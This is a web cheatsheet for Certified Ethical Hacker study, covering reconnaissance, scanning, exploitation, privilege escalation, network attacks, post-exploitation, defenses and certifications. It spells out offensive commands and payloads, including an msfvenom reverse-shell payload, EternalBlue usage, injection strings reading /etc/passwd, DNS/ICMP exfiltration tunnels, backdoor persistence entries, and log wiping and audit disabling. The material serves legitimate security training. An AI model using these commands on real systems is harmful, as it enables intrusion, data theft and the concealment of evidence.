Complete CEH Techniques Cheatsheet: Ethical Hacking Methods & Tools

Cheatsheets

Introduction: What is Ethical Hacking?

Ethical hacking involves legally and methodically attempting to penetrate systems and networks to discover security vulnerabilities that malicious hackers could potentially exploit. Certified Ethical Hackers (CEH) use the same knowledge and tools as malicious hackers but in a lawful and legitimate manner to assess and improve the security posture of organizations. This practice is essential in today’s digital landscape where cyber threats continue to evolve in sophistication and frequency.

The Five Phases of Ethical Hacking

PhaseDescriptionKey Objectives
1. ReconnaissanceGathering information about the targetIdentify scope, collect target details, understand system architecture
2. ScanningIdentifying open ports and vulnerabilitiesDiscover open services, map network, identify potential entry points
3. Gaining AccessExploiting vulnerabilities to enter systemsBreach defenses, elevate privileges, establish persistence
4. Maintaining AccessEnsuring continued access to compromised systemsPlant backdoors, deploy rootkits, create covert channels
5. Covering TracksRemoving evidence of penetrationDelete logs, remove artifacts, conceal communication channels

Reconnaissance Techniques

Passive Reconnaissance

  • WHOIS Lookups: whois domain.com
  • DNS Enumeration: dig domain.com, nslookup domain.com
  • Google Dorking:
    • site:domain.com filetype:pdf
    • intitle:"index of" "parent directory"
    • inurl:admin filetype:php
  • Social Media Intelligence: LinkedIn, Twitter, Facebook profiling
  • OSINT Tools:
    • Maltego
    • Shodan
    • theHarvester: theHarvester -d domain.com -b all
    • Recon-ng: recon-ng

Active Reconnaissance

  • Ping Sweeps: fping -a -g 192.168.1.0/24
  • Traceroute: traceroute domain.com
  • Banner Grabbing: nc -v domain.com 80
  • DNS Zone Transfers: dig axfr @ns1.domain.com domain.com

Network Scanning & Enumeration

Port Scanning Techniques

  • TCP Connect Scan: nmap -sT 192.168.1.1
  • SYN Scan (Half-open): nmap -sS 192.168.1.1
  • UDP Scan: nmap -sU 192.168.1.1
  • FIN Scan: nmap -sF 192.168.1.1
  • XMAS Scan: nmap -sX 192.168.1.1
  • NULL Scan: nmap -sN 192.168.1.1
  • Idle Scan: nmap -sI zombie_ip target_ip

Nmap Cheat Sheet

  • Comprehensive Scan: nmap -A -T4 -p- 192.168.1.1
  • Script Scanning: nmap --script=vuln 192.168.1.1
  • OS Detection: nmap -O 192.168.1.1
  • Service Version Detection: nmap -sV 192.168.1.1
  • Scan Multiple IPs: nmap 192.168.1.1-100
  • Scan from File: nmap -iL targets.txt
  • Output to File: nmap -oA output_name 192.168.1.1

Service Enumeration

  • SMB: enum4linux -a 192.168.1.1
  • SMTP: smtp-user-enum -M VRFY -U users.txt -t 192.168.1.1
  • SNMP: snmpwalk -c public -v1 192.168.1.1
  • NFS: showmount -e 192.168.1.1
  • DNS: dnsrecon -d domain.com -t axfr

Vulnerability Assessment

Vulnerability Scanning Tools

  • OpenVAS: Open-source vulnerability scanner
  • Nessus: Commercial vulnerability assessment solution
  • Nexpose: Rapid7’s vulnerability management solution
  • Qualys: Cloud-based vulnerability management

Web Application Scanning

  • Nikto: nikto -h http://domain.com
  • OWASP ZAP: Automated and manual web app scanning
  • Burp Suite: Web vulnerability scanner and proxy
  • Dirb/Dirbuster: dirb http://domain.com /usr/share/wordlists/dirb/common.txt
  • SQLmap: sqlmap -u "http://domain.com/page.php?id=1" --dbs

Exploitation Techniques

Password Attacks

  • Brute Force: hydra -l admin -P /path/to/wordlist.txt 192.168.1.1 http-post-form
  • Dictionary Attack: john --wordlist=/path/to/wordlist.txt hash_file
  • Rainbow Tables: ophcrack -d /path/to/tables -t /path/to/hash
  • Password Cracking Tools:
    • John the Ripper
    • Hashcat: hashcat -m 0 -a 0 hash.txt wordlist.txt
    • Medusa
    • Aircrack-ng: aircrack-ng -w wordlist.txt capture.cap

Social Engineering

  • Phishing: Creating fake websites, emails
  • Pretexting: Creating a fabricated scenario
  • Baiting: Using physical media like infected USB drives
  • Quid Pro Quo: Offering a service in exchange for information
  • Tailgating: Following someone into a secured area
  • Tools:
    • Social-Engineer Toolkit (SET): setoolkit
    • GoPhish
    • Maltego

Metasploit Framework

  • Starting Metasploit: msfconsole
  • Searching Exploits: search type:exploit platform:windows
  • Using an Exploit: use exploit/windows/smb/ms17_010_eternalblue
  • Setting Options: set RHOSTS 192.168.1.1
  • Running the Exploit: exploit or run
  • Creating Payloads: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe
  • Post-Exploitation Modules: use post/windows/gather/hashdump

Web Application Attacks

  • SQL Injection: ' OR 1=1 --
  • XSS (Cross-Site Scripting): <script>alert('XSS')</script>
  • CSRF (Cross-Site Request Forgery): Creating malicious forms
  • File Inclusion: http://domain.com/page.php?file=../../../etc/passwd
  • Command Injection: ; cat /etc/passwd
  • XML External Entity (XXE): <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Privilege Escalation

Windows

  • Missing Patches: systeminfo
  • Unquoted Service Paths: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
  • Weak Service Permissions: accesschk.exe -uwcqv "Authenticated Users" * /accepteula
  • AlwaysInstallElevated: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • Tools:
    • PowerUp.ps1
    • BeRoot
    • Windows-Exploit-Suggester

Linux

  • SUID Binaries: find / -perm -u=s -type f 2>/dev/null
  • Sudo Rights: sudo -l
  • Kernel Exploits: uname -a to identify kernel version
  • Cron Jobs: Check /etc/crontab and /var/spool/cron/
  • World-Writable Files: find / -writable -type f 2>/dev/null
  • Tools:
    • LinPEAS
    • LinEnum
    • linux-exploit-suggester

Network Attacks

Man-in-the-Middle

  • ARP Poisoning: arpspoof -i eth0 -t target_ip gateway_ip
  • DNS Spoofing: dnsspoof -i eth0 host target.com
  • SSL Stripping: Using sslstrip
  • Tools:
    • Ettercap: ettercap -T -q -i eth0 -M arp:remote /target_ip/ /gateway_ip/
    • Bettercap
    • Wireshark

Wireless Attacks

  • WEP Cracking: aircrack-ng -a 1 -b [BSSID] capture.cap
  • WPA/WPA2 Cracking: aircrack-ng -a 2 -b [BSSID] -w wordlist.txt capture.cap
  • Evil Twin: Creating rogue access points
  • WPS Attacks: reaver -i wlan0mon -b [BSSID] -vv
  • Jamming: Using deauthentication attacks
  • Tools:
    • Aircrack-ng Suite
    • Wifite
    • Kismet
    • Wireshark with monitor mode

Post-Exploitation

Data Exfiltration

  • Using DNS Tunneling: iodine -P password 192.168.1.1 tunnel.domain.com
  • ICMP Tunneling: ptunnel -p 192.168.1.1 -lp 8000 -da target.com -dp 80
  • Using HTTP/HTTPS: Encoding data in HTTP requests
  • Using Steganography: Hiding data in images or audio files
  • Tools:
    • dnscat2
    • Egress-Assess
    • Data Exfiltration Toolkit (DET)

Persistence Mechanisms

  • Windows:
    • Creating services: sc create backdoor binpath="C:\backdoor.exe"
    • Registry autoruns: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\backdoor.exe"
    • Scheduled tasks: schtasks /create /tn "Backdoor" /tr C:\backdoor.exe /sc onlogon
    • WMI persistence: wmic /namespace:"\\root\subscription" path __EventFilter
  • Linux:
    • Adding to /etc/rc.local
    • Creating cron jobs: echo "* * * * * /path/to/backdoor" >> /etc/crontab
    • Adding to startup scripts
    • SSH keys: Adding to ~/.ssh/authorized_keys

Covering Tracks

  • Clearing Windows Event Logs: wevtutil cl System
  • Clearing Linux Logs: echo "" > /var/log/auth.log
  • Timestomping: Modifying file timestamps
  • Disabling Auditing: auditpol /set /category:"System" /success:disable /failure:disable
  • Tools:
    • Metasploit clearev module
    • timestomp.exe
    • anti-forensic techniques

Defense Techniques

Network Security Controls

  • Firewalls: Configuration and rule creation
  • IDS/IPS: Signature vs. anomaly-based detection
  • Network Segmentation: Creating security zones
  • VPN: Secure remote access
  • NAC (Network Access Control): 802.1x implementation

System Hardening

  • Windows Hardening:
    • Disabling unnecessary services
    • Group Policy configuration
    • Regular patching
    • AppLocker policies
  • Linux Hardening:
    • Configuring SELinux/AppArmor
    • Setting proper file permissions
    • Kernel hardening
    • Firewall configuration with iptables/nftables

Application Security

  • Secure Coding Practices
  • OWASP Top 10 Mitigations
  • Web Application Firewalls (WAF)
  • Input Validation and Sanitization
  • Content Security Policy (CSP)

Comprehensive Tools Matrix

Tool CategoryWindows ToolsLinux ToolsCross-Platform Tools
ReconnaissanceActive Directory Explorer, SpiderFoottheHarvester, Recon-ngMaltego, Shodan, Google Dorks
ScanningSuperScan, Advanced Port ScannerNmap, MasscanAngry IP Scanner, Unicornscan
Vulnerability AssessmentNessus, NexposeOpenVAS, LynisQualys, Acunetix, Nikto
Web Application TestingIIS Crypto, FiddlerSkipfish, w3afBurp Suite, OWASP ZAP, SQLmap
Password AttacksCain & Abel, L0phtCrackJohn the Ripper, hashcatHydra, Medusa, RainbowCrack
WirelessAircrack-ng, WiFi AnalyzerKismet, WifiteWireshark, inSSIDer
ExploitationPowerShell Empire, ResponderMetasploit, Social Engineer ToolkitBeEF, Covenant, Immunity CANVAS
Post-ExploitationBloodHound, MimikatzNetcat, WeevelyEmpire, Metasploit, CobaltStrike

Common Vulnerabilities & Exploits

Vulnerability TypeDescriptionCommon ToolsExample CVEs
Buffer OverflowMemory corruption when input exceeds allocated bufferSPIKE, Immunity DebuggerCVE-2020-0796 (SMBGhost)
Command InjectionExecuting OS commands via unsanitized inputCommix, manual testingCVE-2019-11510 (Pulse VPN)
SQL InjectionDatabase manipulation via unsanitized SQL inputSQLmap, sqlninjaCVE-2020-9484 (Tomcat)
Cross-Site ScriptingInjecting client-side scripts into webpagesXSStrike, BeEFCVE-2019-0604 (SharePoint)
Privilege EscalationGaining higher-level permissionsPowerUp, LinPEASCVE-2021-1675 (PrintNightmare)
Remote Code ExecutionExecuting arbitrary code remotelyExploitDB resources, MetasploitCVE-2021-44228 (Log4Shell)
MITMIntercepting/modifying communicationsEttercap, BettercapN/A (attack technique)
Authentication BypassCircumventing authentication mechanismsBurp Intruder, custom scriptsCVE-2019-19781 (Citrix)

Best Practices for Ethical Hacking

Documentation

  • Document all testing activities with timestamps
  • Maintain detailed notes of findings
  • Screenshot evidence of vulnerabilities
  • Create clear, actionable reports for stakeholders

Scope Management

  • Always operate within defined scope boundaries
  • Get written permission before testing
  • Avoid testing production systems without proper approval
  • Follow responsible disclosure policies

Risk Mitigation

  • Use dedicated testing environments when possible
  • Avoid destructive testing without explicit permission
  • Have rollback plans for all exploitation attempts
  • Test during low-traffic periods if testing production

Legal Considerations

  • Understand relevant laws (CFAA, GDPR, etc.)
  • Never exceed authorized access
  • Maintain client confidentiality
  • Properly handle sensitive data discoveries

Ethical Hacking Certification Path

CertificationFocus AreaPrerequisitesValue
CEH (Certified Ethical Hacker)Broad ethical hacking knowledge2 years IT experience recommendedIndustry standard entry certification
OSCP (Offensive Security Certified Professional)Hands-on penetration testingTechnical backgroundHighly respected practical certification
CISSP (Certified Information Systems Security Professional)Overall security management5 years security experienceAdvanced security management
GPEN (GIAC Penetration Tester)Advanced penetration testingTechnical backgroundThorough penetration testing knowledge
CRESTVarious security testing certificationsVaries by certificationWell-respected in UK and Europe
CompTIA PenTest+Vulnerability assessment and penetration testingNetwork+ and Security+ recommendedVendor-neutral penetration testing cert

Resources for Further Learning

Books

  • “The Hacker Playbook” series by Peter Kim
  • “Penetration Testing: A Hands-On Introduction to Hacking” by Georgia Weidman
  • “Red Team Field Manual” by Ben Clark
  • “Blue Team Field Manual” by Alan White & Ben Clark
  • “The Web Application Hacker’s Handbook” by Dafydd Stuttard and Marcus Pinto

Online Platforms

  • HackTheBox
  • TryHackMe
  • VulnHub
  • PortSwigger Web Security Academy
  • SANS Cyber Ranges

Communities and Forums

  • Reddit r/netsec
  • OWASP Community
  • Stack Exchange Information Security
  • HackerOne Hacktivity
  • DEF CON Groups

Practice Environments

  • Metasploitable
  • DVWA (Damn Vulnerable Web Application)
  • OWASP WebGoat
  • OWASP Juice Shop
  • HackTheBox

Quick Reference: Common Ports & Services

PortServiceCommon Vulnerabilities
21FTPAnonymous access, cleartext credentials, outdated versions
22SSHWeak passwords, outdated versions (OpenSSH)
23TelnetCleartext communications, brute force
25SMTPOpen relay, user enumeration
53DNSZone transfers, cache poisoning, amplification
80/443HTTP/HTTPSVarious web vulnerabilities (XSS, SQLi, etc.)
135RPCVarious Windows vulnerabilities
139/445SMB/CIFSEternalBlue, null sessions, weak shares
1433/1434MS SQLSA blank password, excessive privileges
3306MySQLRoot without password, excessive privileges
3389RDPBlueKeep, weak credentials
5900VNCWeak authentication, no encryption

Ethical Hacking Checklist

  • [ ] Get proper written authorization
  • [ ] Define clear scope and boundaries
  • [ ] Prepare tools and testing environment
  • [ ] Conduct reconnaissance
  • [ ] Perform vulnerability scanning
  • [ ] Validate vulnerabilities manually
  • [ ] Attempt exploitation if authorized
  • [ ] Document all findings with evidence
  • [ ] Maintain regular communication with client
  • [ ] Create comprehensive report with remediation steps
  • [ ] Present findings to stakeholders
  • [ ] Assist with remediation if requested
  • [ ] Verify fixes with retesting if in scope
  • [ ] Securely delete all client data after engagement

Related Posts

Subscribe
Subscribe
Scroll to Top